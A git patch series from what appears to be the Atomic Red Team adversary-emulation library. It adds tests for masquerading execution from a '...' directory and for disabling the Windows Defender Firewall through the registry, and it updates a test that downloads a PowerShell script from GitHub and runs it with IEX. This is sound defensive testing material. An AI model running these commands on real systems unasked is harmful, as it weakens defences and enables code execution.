:true},{"techniqueID":"T1566.001","score":100,"enabled":true},{"techniqueID":"T1566","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1569.002","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1573","score":100,"enabled":true},{"techniqueID":"T1574.001","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1574.002","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574.009","score":100,"enabled":true},{"techniqueID":"T1574.011","score":100,"enabled":true},{"techniqueID":"T1574.012","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index d701f7c6..2c3bac55 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -365,6 +365,7 @@ defense-evasion,T1553.005,Mark-of-the-Web Bypass,2,Mount an ISO image and run ex defense-evasion,T1036.004,Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt defense-evasion,T1036.004,Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt defense-evasion,T1036,Masquerading,1,System File Copied to Unusual Location,51005ac7-52e2-45e0-bdab-d17c6d4916cd,command_prompt +defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh defense-evasion,T1112,Modify Registry,1,Modify Registry of Current User Profile - cmd,1324796b-d0f6-455a-b4ae-21ffee6aa6b9,command_prompt defense-evasion,T1112,Modify Registry,2,Modify Registry of Local Machine - cmd,282f929a-6bc5-42b8-bd93-960c3ba35afe,command_prompt defense-evasion,T1112,Modify Registry,3,Modify registry to store logon credentials,c0413fb5-33e2-40b7-9b6f-60b29f4a7a18,command_prompt diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index cd372f79..e3764d6d 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -91,6 +91,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh +defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh defense-evasion,T1036.003,Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh defense-evasion,T1014,Rootkit,1,Loadable Kernel Module based Rootkit,dfb50072-e45a-4c75-a17e-a484809c8553,sh diff --git a/atomics/Indexes/Indexes-CSV/macos-index.csv b/atomics/Indexes/Indexes-CSV/macos-index.csv index e9e50ace..335e60cf 100644 --- a/atomics/Indexes/Indexes-CSV/macos-index.csv +++ b/atomics/Indexes/Indexes-CSV/macos-index.csv @@ -75,6 +75,7 @@ defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modificat defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,7,chown - Change file or folder mode ownership only,967ba79d-f184-4e0e-8d09-6362b3162e99,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,8,chown - Change file or folder ownership recursively,3b015515-b3d8-44e9-b8cd-6fa84faf30b2,bash defense-evasion,T1222.002,Linux and Mac File and Directory Permissions Modification,9,chattr - Remove immutable file attribute,e7469fe2-ad41-4382-8965-99b94dd3c13f,sh +defense-evasion,T1036.005,Match Legitimate Name or Location,1,Execute a process from a directory masquerading as the current parent directory.,812c3ab8-94b0-4698-a9bf-9420af23ce24,sh defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh defense-evasion,T1548.001,Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh defense-evasion,T1548.001,Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 586ecb2f..2c80658d 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -636,7 +636,8 @@ - Atomic Test #2: Creating W32Time similar named service using sc [windows] - [T1036 Masquerading](../../T1036/T1036.md) - Atomic Test #1: System File Copied to Unusual Location [windows] -- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md) + - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux] - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1112 Modify Registry](../../T1112/T1112.md) diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 7df32bb9..bbbb7484 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -238,7 +238,8 @@ - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1036.004 Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md) + - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux] - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1578 Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1601 Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) diff --git a/atomics/Indexes/Indexes-Markdown/macos-index.md b/atomics/Indexes/Indexes-Markdown/macos-index.md index 65e062d0..9253adec 100644 --- a/atomics/Indexes/Indexes-Markdown/macos-index.md +++ b/atomics/Indexes/Indexes-Markdown/macos-index.md @@ -203,7 +203,8 @@ - Atomic Test #9: chattr - Remove immutable file attribute [macos, linux] - T1078.003 Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - T1036 Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) -- T1036.005 Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) +- [T1036.005 Match Legitimate Name or Location](../../T1036.005/T1036.005.md) + - Atomic Test #1: Execute a process from a directory masquerading as the current parent directory. [macos, linux] - T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) - [T1027 Obfuscated Files or Information](../../T1027/T1027.md) - Atomic Test #1: Decode base64 Data into Script [macos, linux] diff --git a/atomics/Indexes/Matrices/linux-matrix.md b/atomics/Indexes/Matrices/linux-matrix.md index a6c4f9c7..e55aedd3 100644 --- a/atomics/Indexes/Matrices/linux-matrix.md +++ b/atomics/Indexes/Matrices/linux-matrix.md @@ -45,7 +45,7 @@ | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | SQL Stored Procedures [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Masquerade Task or Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | -| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | Scheduled Task/Job [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | | | | | Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Systemd Service](../../T1543.002/T1543.002.md) | | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Systemd Timers](../../T1053.006/T1053.006.md) | | Modify System Image [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/macos-matrix.md b/atomics/Indexes/Matrices/macos-matrix.md index 9d447e38..1c1dc3c9 100644 --- a/atomics/Indexes/Matrices/macos-matrix.md +++ b/atomics/Indexes/Matrices/macos-matrix.md @@ -39,7 +39,7 @@ | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | | | | | | Steganography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Trap](../../T1546.005/T1546.005.md) | | Local Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Symmetric Cryptography [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | [Unix Shell Configuration Modification](../../T1546.004/T1546.004.md) | | Masquerading [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Traffic Signaling [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | -| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | +| | | Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | [Web Protocols](../../T1071.001/T1071.001.md) | | | | | Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | [Obfuscated Files or Information](../../T1027/T1027.md) | | | | | | | | | | | | | Pluggable Authentication Modules [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | diff --git a/atomics/Indexes/Matrices/matrix.md b/atomics/Indexes/Matrices/matrix.md index bdd2eed9..f910d1e7 100644 --- a/atomics/Indexes/Matrices/matrix.md +++ b/atomics/Indexes/Matrices/matrix.md @@ -79,7 +79,7 @@ | | | Pre-OS Boot [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Security Support Provider](../../T1547.005/T1547.005.md) | [Mark-of-the-Web Bypass](../../T1553.005/T1553.005.md) | | | | | | | | | | | Print Processors [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | Services File Permissions Weakness [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Masquerade Task or Service](../../T1036.004/T1036.004.md) | | | | | | | | | | | [RC Scripts](../../T1037.004/T1037.004.md) | [Services Registry Permissions Weakness](../../T1574.011/T1574.011.md) | [Masquerading](../../T1036/T1036.md) | | | | | | | | -| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | Match Legitimate Name or Location [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | +| | | ROMMONkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Setuid and Setgid](../../T1548.001/T1548.001.md) | [Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | | | | | | | | | | | [Re-opened Applications](../../T1547.007/T1547.007.md) | [Shortcut Modification](../../T1547.009/T1547.009.md) | Modify Authentication Process [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | [Startup Items](../../T1037.005/T1037.005.md) | Modify Cloud Compute Infrastructure [CONTRIBUTE A TEST](https://atomicredteam.io/contributing) | | | | | | | | | | | [Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md) | [Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Registry](../../T1112/T1112.md) | | | | | | | | diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index fd5147ce..8af77186 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -27709,7 +27709,33 @@ defense-evasion: x_mitre_contributors: - Yossi Weizman, Azure Defender Research Team - Vishwas Manral, McAfee - atomic_tests: [] + identifier: T1036.005 + atomic_tests: + - name: Execute a process from a directory masquerading as the current parent + directory. + auto_generated_guid: 812c3ab8-94b0-4698-a9bf-9420af23ce24 + description: 'Create and execute a process from a directory masquerading as + the current parent directory (`...` instead of normal `..`) + +' + supported_platforms: + - macos + - linux + input_arguments: + test_message: + description: Test message to echo out to the screen + type: String + default: Hello from the Atomic Red Team test T1036.005#1 + executor: + name: sh + elevation_required: false + command: | + mkdir $HOME/... + cp $(which sh) $HOME/... + $HOME/.../sh -c "echo #{test_message}" + cleanup_command: | + rm -f $HOME/.../sh + rmdir $HOME/.../ T1556: technique: external_references: diff --git a/atomics/T1036.005/T1036.005.md b/atomics/T1036.005/T1036.005.md new file mode 100644 index 00000000..458839a1 --- /dev/null +++ b/atomics/T1036.005/T1036.005.md @@ -0,0 +1,47 @@ +# T1036.005 - Match Legitimate Name or Location +## [Description from ATT&CK](https://attack.mitre.org/techniques/T1036/005) +
Adversaries may match or approximate the name or location of legitimate files or resources when naming/placing them. This is done for the sake of evading defenses and observation. This may be done by placing an executable in a commonly trusted directory (ex: under System32) or giving it the name of a legitimate, trusted program (ex: svchost.exe). In containerized environments, this may also be done by creating a resource in a namespace that matches the naming convention of a container pod or cluster. Alternatively, a file or container image name given may be a close approximation to legitimate programs/images or something innocuous. + +Adversaries may also use the same icon of the file they are trying to mimic.
+ +## Atomic Tests + +- [Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory.](#atomic-test-1---execute-a-process-from-a-directory-masquerading-as-the-current-parent-directory) + + +
+ +## Atomic Test #1 - Execute a process from a directory masquerading as the current parent directory. +Create and execute a process from a directory masquerading as the current parent directory (`...` instead of normal `..`) + +**Supported Platforms:** macOS, Linux + + + + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| test_message | Test message to echo out to the screen | String | Hello from the Atomic Red Team test T1036.005#1| + + +#### Attack Commands: Run with `sh`! + + +```sh +mkdir $HOME/... +cp $(which sh) $HOME/... +$HOME/.../sh -c "echo #{test_message}" +``` + +#### Cleanup Commands: +```sh +rm -f $HOME/.../sh +rmdir $HOME/.../ +``` + + + + + +
From 871a3584b86c3b5cb60b2f08b949827d2c60d9b3 Mon Sep 17 00:00:00 2001 From: Jil Larner Date: Tue, 15 Jun 2021 17:44:48 +0200 Subject: [PATCH 27/35] Fixed bug in script path (#1517) The path was referring to T1595.002 instead of T1082, where the script resides. Due to the moved requested in #1320 and missed. --- atomics/T1082/T1082.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml index 1f5b2ab7..95e3ebc2 100644 --- a/atomics/T1082/T1082.yaml +++ b/atomics/T1082/T1082.yaml @@ -121,7 +121,7 @@ atomic_tests: vbscript: description: Path to sample script type: String - default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs + default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs executor: command: 'cscript #{vbscript}' name: powershell From 84f9f9ffdd2a132f4574d98d27f67a7fc2bc3ad2 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 15 Jun 2021 15:45:23 +0000 Subject: [PATCH 28/35] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 2 +- atomics/T1082/T1082.md | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8af77186..8212b5e3 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -52704,7 +52704,7 @@ discovery: vbscript: description: Path to sample script type: String - default: PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs + default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs executor: command: 'cscript #{vbscript}' name: powershell diff --git a/atomics/T1082/T1082.md b/atomics/T1082/T1082.md index 9a0e9550..7c4d1d40 100644 --- a/atomics/T1082/T1082.md +++ b/atomics/T1082/T1082.md @@ -266,7 +266,7 @@ For more information see also e.g. https://malpedia.caad.fkie.fraunhofer.de/deta #### Inputs: | Name | Description | Type | Default Value | |------|-------------|------|---------------| -| vbscript | Path to sample script | String | PathToAtomicsFolder\T1595.002\src\griffon_recon.vbs| +| vbscript | Path to sample script | String | PathToAtomicsFolder\T1082\src\griffon_recon.vbs| #### Attack Commands: Run with `powershell`! From 7a73723a7b9b61eec382c68aa7e81cec577e162a Mon Sep 17 00:00:00 2001 From: SecurityShrimp Date: Tue, 15 Jun 2021 10:46:01 -0500 Subject: [PATCH 29/35] Update T1059.005.yaml (#1518) added lines to enable TLS v 1.2 Co-authored-by: Carrie Roberts --- atomics/T1059.005/T1059.005.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml index df243080..61f9bc20 100644 --- a/atomics/T1059.005/T1059.005.yaml +++ b/atomics/T1059.005/T1059.005.yaml @@ -54,6 +54,7 @@ atomic_tests: Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec" cleanup_command: | @@ -88,8 +89,9 @@ atomic_tests: Write-Host "You will need to install Microsoft #{ms_product} manually to meet this requirement" executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract" cleanup_command: | Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore - name: powershell \ No newline at end of file + name: powershell From a78c0ae822c7bb840730abf991d3a3667aabb798 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 15 Jun 2021 15:46:52 +0000 Subject: [PATCH 30/35] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 +++- atomics/T1059.005/T1059.005.md | 2 ++ 2 files changed, 5 insertions(+), 1 deletion(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 8212b5e3..3e83219d 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -60918,6 +60918,7 @@ execution: ' executor: command: | + [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec" cleanup_command: 'Get-WmiObject win32_process | Where-Object {$_.CommandLine @@ -60955,7 +60956,8 @@ execution: ' executor: - command: "IEX (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX + (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-Maldoc -macroFile \"PathToAtomicsFolder\\T1059.005\\src\\T1059_005-macrocode.txt\" -officeProduct \"Word\" -sub \"Extract\"\n" cleanup_command: 'Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" diff --git a/atomics/T1059.005/T1059.005.md b/atomics/T1059.005/T1059.005.md index b4f09402..42e8cd66 100644 --- a/atomics/T1059.005/T1059.005.md +++ b/atomics/T1059.005/T1059.005.md @@ -84,6 +84,7 @@ You can validate this by opening WinWord -> File -> Account -> About Word ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec" ``` @@ -137,6 +138,7 @@ memory location to a file stored in the $env:TEMP\atomic_t1059_005_test_output.b ```powershell +[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract" ``` From 9f397c259c8ea3f9123f23b203f2f82a2b9514ea Mon Sep 17 00:00:00 2001 From: BlueTeamOps <1480956+blueteam0ps@users.noreply.github.com> Date: Wed, 16 Jun 2021 01:49:55 +1000 Subject: [PATCH 31/35] Added Disabling Firewall via Registry (#1516) Co-authored-by: Carrie Roberts --- atomics/T1562.004/T1562.004.yaml | 13 +++++++++++++ 1 file changed, 13 insertions(+) diff --git a/atomics/T1562.004/T1562.004.yaml b/atomics/T1562.004/T1562.004.yaml index e123cf1b..24eeec66 100644 --- a/atomics/T1562.004/T1562.004.yaml +++ b/atomics/T1562.004/T1562.004.yaml @@ -36,6 +36,19 @@ atomic_tests: cleanup_command: | netsh advfirewall set currentprofile state on >nul 2>&1 name: command_prompt +- name: Disable Microsoft Defender Firewall via Registry + auto_generated_guid: afedc8c4-038c-4d82-b3e5-623a95f8a612 + description: | + Disables the Microsoft Defender Firewall for the public profile via registry + Caution if you access remotely the host where the test runs! Especially with the cleanup command which will re-enable firewall for the current profile... + supported_platforms: + - windows + executor: + command: | + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 0 /f + cleanup_command: | + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile" /v "EnableFirewall" /t REG_DWORD /d 1 /f + name: command_prompt - name: Allow SMB and RDP on Microsoft Defender Firewall auto_generated_guid: d9841bf8-f161-4c73-81e9-fd773a5ff8c1 description: | From 62f0f37fc663bfa36846890978c719c51a2ab07d Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team GUID generator Date: Tue, 15 Jun 2021 15:50:17 +0000 Subject: [PATCH 32/35] Generate GUIDs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/used_guids.txt | 1 + 1 file changed, 1 insertion(+) diff --git a/atomics/used_guids.txt b/atomics/used_guids.txt index 6b32dc04..03f6048b 100644 --- a/atomics/used_guids.txt +++ b/atomics/used_guids.txt @@ -719,3 +719,4 @@ c89becbe-1758-4e7d-a0f4-97d2188a23e3 4f08197a-2a8a-472d-9589-cd2895ef22ad d546a3d9-0be5-40c7-ad82-5a7d79e1b66b 812c3ab8-94b0-4698-a9bf-9420af23ce24 +afedc8c4-038c-4d82-b3e5-623a95f8a612 From 8a67b64944ac8c4e7d7ca01deac11c6fb5fb2727 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Tue, 15 Jun 2021 15:50:23 +0000 Subject: [PATCH 33/35] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/Indexes-CSV/index.csv | 9 ++-- atomics/Indexes/Indexes-CSV/windows-index.csv | 9 ++-- atomics/Indexes/Indexes-Markdown/index.md | 9 ++-- .../Indexes/Indexes-Markdown/windows-index.md | 9 ++-- atomics/Indexes/index.yaml | 17 +++++++ atomics/T1562.004/T1562.004.md | 47 +++++++++++++++---- 6 files changed, 76 insertions(+), 24 deletions(-) diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index 2c3bac55..a2bca221 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -272,10 +272,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit L defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,1,Disable firewall,80f5e701-f7a4-4d06-b140-26c8efd1b6b4,sh defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell -defense-evasion,T1562.004,Disable or Modify System Firewall,6,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell +defense-evasion,T1562.004,Disable or Modify System Firewall,3,Disable Microsoft Defender Firewall via Registry,afedc8c4-038c-4d82-b3e5-623a95f8a612,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,4,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,5,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt +defense-evasion,T1562.004,Disable or Modify System Firewall,6,Open a local port through Windows Firewall to any profile,9636dd6e-7599-40d2-8eee-ac16434f35ed,powershell +defense-evasion,T1562.004,Disable or Modify System Firewall,7,Allow Executable Through Firewall Located in Non-Standard Location,6f5822d2-d38d-4f48-9bfc-916607ff6b8c,powershell defense-evasion,T1562.001,Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh defense-evasion,T1562.001,Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh defense-evasion,T1562.001,Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index cbe6e63b..f7877e90 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -186,10 +186,11 @@ defense-evasion,T1562.002,Disable Windows Event Logging,2,Kill Event Log Service defense-evasion,T1562.002,Disable Windows Event Logging,3,Impair Windows Audit Log Policy,5102a3a7-e2d7-4129-9e45-f483f2e0eea8,command_prompt defense-evasion,T1562.002,Disable Windows Event Logging,4,Clear Windows Audit Policy Config,913c0e4e-4b37-4b78-ad0b-90e7b25010f6,command_prompt defense-evasion,T1562.004,Disable or Modify System Firewall,2,Disable Microsoft Defender Firewall,88d05800-a5e4-407e-9b53-ece4174f197f,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,3,Allow SMB and RDP on Microsoft Defender Firewall,d9841bf8-f161-4c73-81e9-fd773a5ff8c1,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,4,Opening ports for proxy - HARDRAIN,15e57006-79dd-46df-9bf9-31bc24fb5a80,command_prompt -defense-evasion,T1562.004,Disable or Modify System Firewall,5,Open a local port through Windows Firewall to any 